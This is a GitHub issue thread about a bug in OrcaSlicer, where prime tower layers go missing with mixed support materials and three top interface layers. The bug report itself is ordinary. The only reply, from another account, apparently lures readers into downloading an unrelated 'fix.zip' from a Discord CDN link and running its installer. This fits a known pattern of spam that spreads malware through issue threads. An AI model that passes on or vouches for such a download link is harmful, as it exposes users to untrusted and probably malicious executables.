### ISSUE TITLE
Missing prime tower layer when using a different material for support interface and 3 top layers

### ISSUE THREAD

**Issue by Ataraxia-Mechanica** [SoftFever/OrcaSlicer#6640]
### Is there an existing issue for this problem?

- [X] I have searched the existing issues

### OrcaSlicer Version

2.2.0 dev

### Operating System (OS)

Windows

### OS Version

Windows 10

### Printer

Voron 0 custom extra toolhead prototype

### How to reproduce

Use material 1 as support base and material 2 as support interface, set top interface layer to 3, enable prime tower

### Actual results

2 layers of the prime tower is missing
![image](https://github.com/user-attachments/assets/9b0def8b-c166-4c8a-a2b1-9262e0c9b2fb)

### Expected results

No missing prime tower

### Project file & Debug log uploads

[Hilbert_2it_Square.zip](https://github.com/user-attachments/files/16843875/Hilbert_2it_Square.zip)

### Checklist of files to include

- [ ] Log file
- [X] Project file

### Anything else?

No issue when the support is all material 2, or using 4/2 top interface layers

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
